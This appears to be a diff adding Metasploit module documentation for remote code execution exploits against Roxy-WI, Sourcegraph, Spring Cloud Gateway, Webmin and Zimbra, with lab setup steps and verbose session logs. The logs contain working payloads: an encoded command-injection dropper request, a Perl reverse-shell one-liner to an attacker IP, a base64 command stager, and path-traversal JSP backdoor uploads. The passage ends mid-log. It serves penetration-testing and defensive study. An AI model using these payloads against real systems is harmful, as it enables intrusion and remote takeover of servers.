+       RPORT      443              yes       The target port (TCP)
+       SRVHOST    0.0.0.0          yes       The local host or network interface to listen on
+                                             . This must be an address on the local machine o
+                                             r 0.0.0.0 to listen on all addresses.
+       SRVPORT    8080             yes       The local port to listen on.
+       SSL        true             no        Negotiate SSL/TLS for outgoing connections
+       SSLCert                     no        Path to a custom SSL certificate (default is ran
+                                             domly generated)
+       TARGETURI  /                yes       The URI of the vulnerable instance
+       URIPATH                     no        The URI to use for this exploit (default is rand
+                                             om)
+       VHOST                       no        HTTP server virtual host
+    
+    
+    Payload options (linux/x64/shell/reverse_tcp):
+    
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  172.22.230.145   yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       1   Linux (Dropper)
+    
+    
+    msf6 exploit(linux/http/roxy_wi_exec) > run
+    
+    [*] Started reverse TCP handler on 172.22.230.145:4444 
+    [*] Running automatic check ("set AutoCheck false" to disable)
+    [*] Checking if 127.0.0.1:443 is vulnerable!
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 93
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20id%20%3b%23&alert_consumer=oodqhqe&backend_server=127.0.0.1
+    ####################
+    # Response:
+    ####################
+    HTTP/1.1 200 OK
+    Date: Mon, 25 Jul 2022 19:07:53 GMT
+    Server: Apache/2.4.52 (Ubuntu)
+    Vary: Accept-Encoding
+    Transfer-Encoding: chunked
+    Content-Type: text/html; charset=UTF-8
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section configs and parameter haproxy_save_configs_dir</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    <center><div class="alert alert-danger">Check the config file. Presence section mysql and parameter enable</div>
+    Content-type: text/html
+    
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    
+    [*] 127.0.0.1:443 is vulnerable!
+    [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed.
+    [*] Exploiting...
+    ####################
+    # Request:
+    ####################
+    POST /app/options.py HTTP/1.1
+    Host: 127.0.0.1
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
+    Content-Type: application/x-www-form-urlencoded
+    Content-Length: 939
+    
+    serv=127.0.0.1&ipbackend=%22%3b%20printf%20%27\177\105\114\106\2\1\1\0\0\0\0\0\0\0\0\0\2\0\76\0\1\0\0\0\170\0\100\0\0\0\0\0\100\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\70\0\1\0\0\0\0\0\0\0\1\0\0\0\7\0\0\0\0\0\0\0\0\0\0\0\0\0\100\0\0\0\0\0\0\0\100\0\0\0\0\0\372\0\0\0\0\0\0\0\174\1\0\0\0\0\0\0\0\20\0\0\0\0\0\0\110\61\377\152\11\130\231\266\20\110\211\326\115\61\311\152\42\101\132\262\7\17\5\110\205\300\170\121\152\12\101\131\120\152\51\130\231\152\2\137\152\1\136\17\5\110\205\300\170\73\110\227\110\271\2\0\21\134\254\26\346\221\121\110\211\346\152\20\132\152\52\130\17\5\131\110\205\300\171\45\111\377\311\164\30\127\152\43\130\152\0\152\5\110\211\347\110\61\366\17\5\131\131\137\110\205\300\171\307\152\74\130\152\1\137\17\5\136\152\46\132\17\5\110\205\300\170\355\377\346%27%3e%3e/tmp/olXCy%20%3b%20chmod%20%2bx%20/tmp/olXCy%20%3b%20/tmp/olXCy%20%3b%20rm%20-f%20/tmp/olXCy%20%3b%23&alert_consumer=kvlkaqe&backend_server=127.0.0.1
+    [*] Sending stage (38 bytes) to 172.22.230.145
+    [*] Command shell session 2 opened (172.22.230.145:4444 -> 172.22.230.145:41508) at 2022-07-25 14:07:59 -0500
+    i####################
+    # Response:
+    ####################
+    No response received
+    d[*] Command Stager progress - 100.00% done (810/810 bytes)
+    
+    id
+    uid=33(www-data) gid=33(www-data) groups=33(www-data)
+    whoami
+    www-data
+    pwd
+    /var/www/haproxy-wi/app
+    ls
+    __pycache__
+    add.py
+    certs
+    config.py
+    create_db.py
+    db_model.py
+    funct.py
+    ha.py
+    hapservers.py
+    history.py
+    login.py
+    logs.py
+    metrics.py
+    nettools.py
+    options.py
+    overview.py
+    portscanner.py
+    provisioning.py
+    roxy-wi.db
+    runtimeapi.py
+    scripts
+    sections.py
+    servers.py
+    smon.py
+    sql.py
+    templates
+    users.py
+    versions.py
+    viewlogs.py
+    viewsttats.py
+    waf.py
+```
@@ -0,0 +1,95 @@
+## Vulnerable Application
+
+A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+commands that are able to be executed through the git exec REST API.
+
+The cloned repositories can be enumerated from the `/list` endpoint using the curl command:
+`curl http://$target:3178/list?cloned=true`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application (see detailed Docker Installation section below)
+2. Start msfconsole
+3. Do: `use exploits/linux/http/sourcegraph_gitserver_sshcmd`
+4. Set the `RHOSTS`, `PAYLOAD` and any payload related options that are necessary
+5. Do: `run`
+
+### Docker Installation
+1. Run the following command to start the all-inclusive docker container for Sourcegraph v3.36.3.
+
+    ```
+    docker run \
+      --publish 3178:3178 \
+      --publish 7080:7080 \
+      --publish 127.0.0.1:3370:3370 \
+      --rm \
+      --volume /tmp/sourcegraph/config:/etc/sourcegraph \
+      --volume /tmp/sourcegraph/data:/var/opt/sourcegraph \
+      sourcegraph/server:3.36.3
+    ```
+2. Once the service has started, navigate to the webinterface at http://localhost:7080
+3. When prompted, create an administrator's account
+4. At least one git repository must be added, complete the following steps to add one.
+    1. Navigate to `Repositories > Managed code hosts`
+    2. Select "Generic Git host"
+    3. When prompted, use the following example JSON code to clone Metasploit.
+
+        ```
+        {
+          "url": "https://github.com/",
+          "repos": [
+            "rapid7/metasploit-framework.git"
+          ]
+        }
+       ```
+
+## Options
+
+### EXISTING_REPO
+
+An existing, cloned repository. If this value is not set, a random one will be selected from the server.
+
+## Scenarios
+
+### Docker v3.36.3
+
+```
+msf6 > use exploit/linux/http/sourcegraph_gitserver_sshcmd
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > set LHOST 192.168.250.134
+LHOST => 192.168.250.134
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > check
+[+] 192.168.159.128:3178 - The target is vulnerable. Successfully set core.sshCommand.
+msf6 exploit(linux/http/sourcegraph_gitserver_sshcmd) > exploit
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully set core.sshCommand.
+[*] Using automatically identified repository: github.com/zerosteiner/gh-sandbox
+[*] Executing Unix Command target
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Sending stage (40168 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:59116) at 2022-07-08 17:23:15 -0400
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 172.17.0.2:59124) at 2022-07-08 17:23:15 -0400
+
+meterpreter > 
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : caab8e904df4
+OS              : Linux 5.17.12-100.fc34.x86_64 #1 SMP PREEMPT Mon May 30 17:47:02 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,80 @@
+## Vulnerable Application
+
+The vulnerability exploits [CVE-2022-22947](https://nvd.nist.gov/vuln/detail/CVE-2022-22947) an unauthenticated RCE
+vulnerability in Spring Cloud Gateway. According to [VMware](https://tanzu.vmware.com/security/cve-2022-22947)
+the versions affected are:
+
+- 3.1.0
+- 3.0.0 to 3.0.6
+- Older, unsupported versions are also affected
+
+A sample demo [project](https://github.com/wdahlenburg/spring-gateway-demo) is available,
+which can be used to run a vulnerable server by following the installation instructions below.
+    
+### Installation Instructions
+
+```bash
+    # To use the pre-compile vulnerable application
+    wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
+    sudo apt install default-jdk
+    java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+
+
+    # If you want to compile for a version of spring cloud gateway on your own
+    git clone https://github.com/wdahlenburg/spring-gateway-demo.git
+
+    # In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. 
+    # To see which spring cloud version includes which version of spring cloud gateway, 
+    # look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/
+
+    apt install maven
+    mvn package -DskipTests
+    java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar # This will host the app on port 9000
+```
+
+
+## Verification Steps
+
+- Run the vulnerable server
+- Start msfconsole
+- Do: `use exploit/linux/http/spring_cloud_gateway_rce`
+- Do: `set RHOSTS <server_ip>`
+- Do: `set LHOST <metasploit_machine_ip>`
+- Do: `set RPORT 9000`
+- Do: `run`
+- You should get a Meterpreter shell.
+
+## Options
+
+No particular option to be set
+
+## Scenarios
+
+### Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
+
+```
+msf6 > use exploit/linux/http/spring_cloud_gateway_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
+RHOSTS => 192.168.19.140
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
+RPORT => 9000
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > set LHOST 192.168.1.7
+LHOST => 192.168.1.7
+msf6 exploit(linux/http/spring_cloud_gateway_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.7:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if server is vulnerable
+[*] Triggering code execution using routes
+[+] Route deleted
+[+] The target is vulnerable.
+[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
+[*] Triggering code execution using routes
+[*] Sending stage (40164 bytes) to 192.168.1.7
+[*] Meterpreter session 7 opened (192.168.1.7:4444 -> 192.168.1.7:53264) at 2022-10-11 17:44:53 -0400
+[+] Route deleted
+
+meterpreter >
+```
+
@@ -0,0 +1,103 @@
+## Vulnerable Application
+
+This module exploits an arbitrary command injection in Webmin versions prior to
+1.997.
+
+Webmin uses the OS package manager (`apt`, `yum`, etc.) to perform package
+updates and installation. Due to a lack of input sanitization, it is possible to
+inject an arbitrary command that will be concatenated to the package manager call.
+
+This exploit requires authentication and the account must have access to the
+Software Package Updates module.
+
+## Installation
+
+### Ubuntu
+- Download a vulnerable version: http://prdownloads.sourceforge.net/webadmin/webmin_1.996_all.deb
+- Install it along with its dependencies (`libio-pty-perl` required when installing on Ubuntu 20.04)
+```
+apt-get install libauthen-pam-perl libio-pty-perl
+dpkg -i ./webmin_1.996_all.deb
+```
+
+## Setup
+- Go to `https://<target IP>:10000/`
+- Login as `root` with the OS password
+- Create a new user:
+  `Webmin > Webmin Users > Create a new privileged user > enter the username and password > click Create`
+- Setup permissions
+  `Click on the username > Available Webmin modules > select "Software Package Updates" in the System module list > Save`
+
+## Verification Steps
+1. Install and setup the application
+1. Start msfconsole
+1. Do: `use exploit/linux/http/webmin_package_updates_rce`
+1. Do: `run lhost=<local IP> rhosts=<target IP> username=<username> password=<user password>`
+1. You should get a shell.
+
+## Options
+
+### TARGETURI
+
+Set this to the Webmin base path. The default is `/`.
+
+### USERNAME
+
+The account username to use.
+
+### PASSWORD
+
+The account password.
+
+## Scenarios
+
+### Webmin 1.996 on Ubuntu 18.04
+- Target 0 (`Unix In-Memory`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.0.2:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Command shell session 4 opened (192.168.0.2:4444 -> 192.168.0.23:51860) at 2022-08-03 11:26:01 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+
+cat /etc/issue
+Ubuntu 18.04.6 LTS \n \l
+```
+
+- Target 1 (`Linux Dropper`)
+```
+msf6 exploit(linux/http/webmin_package_updates_rce) > run lhost=192.168.0.2 verbose=true rhosts=192.168.0.23 username=msfuser password=123456
+
+[*] Started reverse TCP handler on 192.168.0.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Webmin 1.996 detected
+[+] Webmin 1.996 is a supported target
+[+] The target appears to be vulnerable.
+[*] Attempting login
+[+] Logged in!
+[*] Sending payload
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCokAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/abOFM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/IBkCa' < '/tmp/abOFM.b64' ; chmod +x '/tmp/IBkCa' ; '/tmp/IBkCa' ; rm -f '/tmp/IBkCa' ; rm -f '/tmp/abOFM.b64'"]
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 192.168.0.23
+[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.23:51870) at 2022-08-03 11:26:51 +0200
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.0.23
+OS           : Ubuntu 18.04 (Linux 5.4.0-122-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,190 @@
+## Vulnerable Application
+
+This module exploits a symlink-based path traversal vulnerability in `cpio`
+(that's identified as CVE-2015-1197) that's exploitable in Zimbra. The
+following versions of Zimbra are vulnerable:
+
+* Zimbra Collaboration Suite 9.0.0 Patch 26 (and earlier)
+* Zimbra Collaboration Suite 8.8.15 Patch 33 (and earlier)
+
+The patch for Zimbra adds `pax` as a pre-requisite, so any version of Zimbra
+(except Ubuntu 18.04, which has a patched `cpio` binary) can be made vulnerable
+with `rm $(which pax)`.
+
+To verify a host is vulnerable, ensure that `pax` is not installed on the host.
+Also, validate that `cpio` is listed in `amavisd.conf` as an option to extract
+.tar/.cpio files:
+
+```
+[ron@mail tmp]$ sudo cat /opt/zimbra/conf/amavisd.conf | grep cpio
+[...]
+
+  [['cpio','tar'], \&do_pax_cpio, ['pax', 'gcpio', 'cpio'] ],
+```
+
+Note that this can be chained with other Zimbra exploits to get root.
+
+### Installing Zimbra
+
+Create a VM
+
+```
+HDD = 128gb
+Memory/etc don't matter
+```
+
+I installed a local DNS server (note: replace `<ip>` with the host's actual ip)
+(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
+
+```
+sudo apt update && sudo apt install dnsmasq
+sudo hostnamectl set-hostname mail.example.org
+echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
+echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
+```
+
+Configure the host to use it:
+
+```
+sudo systemctl disable systemd-resolved
+sudo systemctl stop systemd-resolved
+sudo killall dnsmasq
+sudo systemctl restart dnsmasq
+echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
+```
+
+Download Zimbra from
+https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
+have to sell your soul and opt-in to spam, but they don't validate your email.
+
+```
+tar -xvvzf zcs-*.tgz
+cd zcs*
+sudo ./install.sh
+
+* Lots of <enter>
+* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
+* Yes change the system
+* Setup the admin password, probably turn off auto-updates
+```
+
+
+## Verification Steps
+
+1. Do: `use exploit/linux/http/zimbra_cpio_cve_2022_41352`
+1. Do: `set RHOSTS <target>`
+1. Do: `set LHOST <listenerip>`
+1. Do: `exploit`
+
+
+## Options
+
+### `FILENAME`
+
+The filename to generate - defaults to `payload.tar`, but can be changed on the
+filesystem or whatever.
+
+### `TARGET_PATH`
+
+The absolute path where the payload will extract to. The default is the
+webroot, which is usually what you want
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't
+execute.
+
+By default, it's a random string with `.jsp` on the end, in the `public/`
+folder. That should work fine, especially because we can't overwrite files and
+don't want to use the same payload name more than once.
+
+### `SYMLINK_FILENAME`
+
+The path used for the symlink inside the archive; you probably won't ever want
+to change this (default: random)
+
+### `TRIGGER_PAYLOAD`
+
+A boolean, default `true`, that determines whether we use HTTP requests to
+trigger the .jsp payload. Set to `false` to trigger the payload manually.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every
+`CheckInterval`, it performs an HTTP request to the payload path.
+
+
+## Scenarios
+
+To exploit Zimbra, first load the module and generate the .tar file:
+
+```
+msf6 > use exploit/linux/http/zimbra_cpio_cve_2022_41352
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set LHOST 172.16.166.147
+LHOST => 172.16.166.147
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > set RHOSTS 172.16.166.158
+RHOSTS => 172.16.166.158
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > exploit
+[*] Exploit running as background job 0.
+[*] Started reverse TCP handler on 172.16.166.147:4444
+[*] Encoding the payload as a .jsp file
+[*] Adding symlink to path to .tar file: /opt/zimbra/jetty_base/webapps/zimbra/
+[*] Adding target file to the archive: public/bdhg.jsp
+[+] payload.tar stored at /home/ron/.msf4/local/payload.tar
+[+] File created! Email the file above to any user on the target Zimbra server
+
+[...] waiting [...]
+```
+
+Then, email that file to any user (including a non-existent mailbox) on the
+Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract
+it to check for malware with no user interaction. Metasploit should see the
+malicious file extracted and get a session:
+
+```
+[...]
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/bdhg.jsp every 5s [backgrounding]...
+
+[file emailed]
+
+[*] Sending stage (3045348 bytes) to 172.16.166.158
+[*] Meterpreter session 1 opened (172.16.166.147:4444 -> 172.16.166.158:44808) at 2022-10-06 10:27:34 -0700
+
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+For bonus points, use a different module to get root:
+
+```
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_slapper_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > set SESSION 1
+SESSION => 1
+
+msf6 exploit(linux/local/zimbra_slapper_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 172.16.166.147:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Executing: sudo -n -l
+[+] The target appears to be vulnerable.
+[*] Creating exploit directory: /tmp/.vT1bDSvZV
+[*] Attempting to trigger payload: sudo /opt/zimbra/libexec/zmslapd -u root -g root -f /tmp/.vT1bDSvZV/.RhmWwHRn
+[*] Sending stage (3045348 bytes) to 172.16.166.158
+[+] Deleted /tmp/.vT1bDSvZV
+[*] Meterpreter session 2 opened (172.16.166.147:4444 -> 172.16.166.158:60166) at 2022-10-06 10:45:30 -0700
+
+meterpreter > getuid
+Server username: root
+```
+
@@ -0,0 +1,199 @@
+## Vulnerable Application
+
+This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability
+in the following versions of Zimbra Collaboration Suite:
+
+* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
+* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)
+
+Note that the open source edition is not affected.
+
+Successful exploitation results in RCE as the `zimbra` user.
+
+Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12,
+which you can currently get [here](https://www.zimbra.com/downloads/zimbra-collaboration/). On the download page,
+after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.
+
+To set the server up:
+1. `wget https://files.zimbra.com/downloads/8.8.12_GA/zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz` on a Ubuntu 18.04 VM.
+1. `tar -xvf zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz`
+1. `hostnamectl set-hostname <hostname of your choice>` to set the hostname for the VM.
+1. Edit the `/etc/hosts` file and add in a line `127.0.0.1 <hostname of your choice>`
+1. `cd zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002 && sudo ./setup.sh`
+1. Answer `Y` to every question.
+1. You will need to wait a while whilst some stuff is set up. You should then get to a menu.
+1. Use the number keys to select the menu options.
+1. Configure the rest of the options such as the admin password, and full path to license file.
+1. Once everything is configured you should get a prompt to press `a` to save and install. Press `a` when this appears.
+1. You will then be prompted to save the configuration. Accept this and respond `Y` to any further prompts.
+1. Server should start installing. Once its finished you should be ready to test.
+
+Once the server is up, it's vulnerable.
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700
+```
+
+There's no easy way that I see to check for the patch (and the only vulnerable version I have is
+quite a bit older), so attempts to exploit patched versions will likely result in a warning message
+that the target may not vulnerable:
+
+```
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/gauca.jsp
+[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
+[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
+[*] Exploit completed, but no session was created.
+```
+
+## Verification Steps
+1. `use exploit/linux/http/zimbra_mboximport_cve_2022_27925`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell as the `zimbra` user.
+
+## Options
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially
+because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TARGET_USERNAME`
+
+The username included in the `mboximport` request - any valid username works, `admin` is usually fine.
+
+## Scenarios
+
+### Zimbra Collaboration Suite Network Edition 8.8.12 Patch 6 on Ubuntu 18.04
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
+RHOSTS => 10.0.0.166
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options
+
+Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
+
+   Name             Current Setting                                                                   Required  Description
+   ----             ---------------                                                                   --------  -----------
+   Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT            7071                                                                              yes       The target port (TCP)
+   SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
+   TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
+   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
+   TARGET_USERNAME  admin                                                                             yes       The target user, must be valid on the Zimbra server
+   VHOST                                                                                              no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.0.0.146       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Zimbra Collaboration Suite
+
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444 
+[*] Encoding the payload as a .jsp file
+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Sending POST request with ZIP file
+[*] Trying to trigger the backdoor @ public/nkxj.jsp
+[*] Sending stage (3020772 bytes) to 10.0.0.166
+[+] Successfully triggered the payload
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:48640) at 2022-08-22 11:08:19 -0700
+
+meterpreter > getuid
+Server username: zimbra
+
+meterpreter > shell
+Process 121849 created.
+Channel 1 created.
+/opt/zimbra/bin/zmcontrol -v
+Release 8.8.12.GA.3794.UBUNTU18.64 UBUNTU18_64 NETWORK edition, Patch 8.8.12_P6.
+```
+
+### Zimbra Collaboration Suite Network Edition 8.8.15 Patch 33 on Ubuntu 18.04
+
+Note: This version is not vulnerable, because the issue is patched
+
+```
+msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.167
+RHOSTS => 10.0.0.167
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.146:4444
+[*] Encoding the payload as a .jsp file
